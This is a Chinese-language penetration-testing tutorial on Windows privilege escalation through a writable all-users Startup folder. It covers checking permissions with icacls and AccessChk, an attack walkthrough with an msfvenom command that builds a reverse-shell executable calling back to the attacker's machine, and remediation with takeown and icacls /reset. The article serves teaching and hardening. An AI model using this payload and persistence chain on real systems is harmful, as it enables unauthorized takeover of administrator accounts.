文章总结： 本文详细分析了Windows启动文件夹因权限配置不当导致的高危提权漏洞，攻击者可利用Users组写入权限植入恶意程序，在管理员登录时自动执行以获取系统最高权限。文档提供了使用icacls和AccessChk工具检测风险的方法，并给出通过takeown和icacls命令重置权限的修复方案，强调系统加固时应重点检查此类自动运行项。 综合评分： 87 文章分类： 渗透测试,红队,内网渗透,应急响应,漏洞分析

【提权基础入门第四节】启动文件夹提权：被忽视的Windows高危后门

幻泉之洲

2026年3月26日 12:00 北京

在小说阅读器读本章

去阅读

启动文件夹是Windows为用户提供的便利功能，但不当的权限设置会让它成为攻击者绝佳的权限维持和提权通道。这篇文章会告诉你黑客如何利用这个弱点，以及如何发现和封堵它。

开机自动运行，这事听起来挺方便。在Windows里，你只需要把程序或脚本丢进一个叫Startup 的文件夹，下次开机登录，它们就自己启动了。

这个设计初衷挺好的，对吧？你可以让常用软件自动打开，节省时间。

为什么它成了攻击入口？

关键在于权限。如果这个启动文件夹的访问权限设置错了，任何能接触到这台电脑的用户（甚至是通过其他漏洞获得用户权限的攻击者）都可以往里扔东西。

想象一下这个场景。攻击者通过某种方式（比如钓鱼邮件、网站漏洞）在你的电脑上获得了一个普通用户的权限。他发现，这台机器的启动文件夹居然允许“Users”组的成员写入。

那事情就简单了。他把自己伪装好的恶意程序放进去，然后等你或别的用户（尤其是管理员）下次重启电脑并登录。

当管理员账户登录时，系统会执行启动文件夹里的所有内容。这时，那个恶意程序就会以管理员的身份跑起来，攻击者瞬间就拿到了整个系统的最高权限。

这个过程，在黑客术语里，叫做“权限维持” 或“提权” 。启动文件夹在这里扮演了一个绝佳的后门角色。

▲ 启动文件夹的典型路径

怎么判断你的电脑有没有这个风险？

手动检查

最直接的办法就是看文件夹的访问控制列表。

打开命令提示符，输入下面这行命令，它能告诉你谁对这个文件夹有什么权限：

icacls “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”

▲ 使用icacls命令检查权限

你需要关注的是，在返回的结果里，有没有Users 组被授予了(W) 或(F) 权限。

• (W)

  表示有写入权限，能往里面放文件。

• (F)

  表示完全控制权限，能放能删。

如果看到了，那你的系统就存在这个风险。

使用工具检查

Sysinternals工具包里有个叫accesschk.exe 的小工具，用起来更直观。

accesschk.exe /accepteula “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”

▲ 使用AccessChk检查，结果显示Users组有写入权限

它直接告诉你，BUILTIN\Users 有FILE_WRITE_DATA 的访问权限，风险一目了然。

攻击者会怎么做？

假设我们已经发现了这个漏洞，接下来就是利用环节。攻击流程非常直接：

1. 制作后门程序。用msfvenom 生成一个反向shell，监听端设在攻击者的机器上。

   msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe

2. 把这个shell.exe 文件放到目标机器的启动文件夹里。

3. 在攻击者的Kali机器上，启动一个监听器，等着连接。

4. 想办法让受害机器重启，或者等它自然重启。管理员用户一旦登录，后门就会自动运行。

▲ 将恶意程序放入启动文件夹

▲ 受害者机器重启登录

▲ 攻击者获得了管理员权限的shell

看到没？整个过程不需要复杂的技术，就是一个标准的“发现漏洞-利用漏洞”流程。对于攻击者来说，这简直是送上门的礼物。

怎么修复？

核心思路：收紧权限

其实微软早就想到了这个问题。默认情况下，普通用户是不能往这个系统级的启动文件夹里写东西的。

问题往往出在系统部署或第三方软件安装时，有人图省事，或者根本不懂安全，把权限给改了。

修复就两步，在管理员权限的命令提示符里执行：

takeown /F “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup” /A /R /D Y icacls “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup” /reset /T /C /Q

第一行命令，用takeown 把文件夹的所有权拿回来。第二行命令，用icacls /reset 把文件夹的权限重置到Windows的默认安全状态。

执行完后，再用icacls 检查一下，应该就看不到Users 组有写入权限了。这个洞就算堵上了。

说实话，这种漏洞之所以能存在，很多时候是因为大家对Windows的内置功能太习以为常了，觉得“不就这么回事吗”，反而忽略了安全检查。在渗透测试里，我每次都会优先检查这些自动运行项，命中率相当高。

所以，下次做安全配置或者系统加固的时候，别忘了看一眼这个不起眼的启动文件夹。它可能比你想象的要危险。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：幻泉之洲 《【提权基础入门第四节】启动文件夹提权：被忽视的Windows高危后门》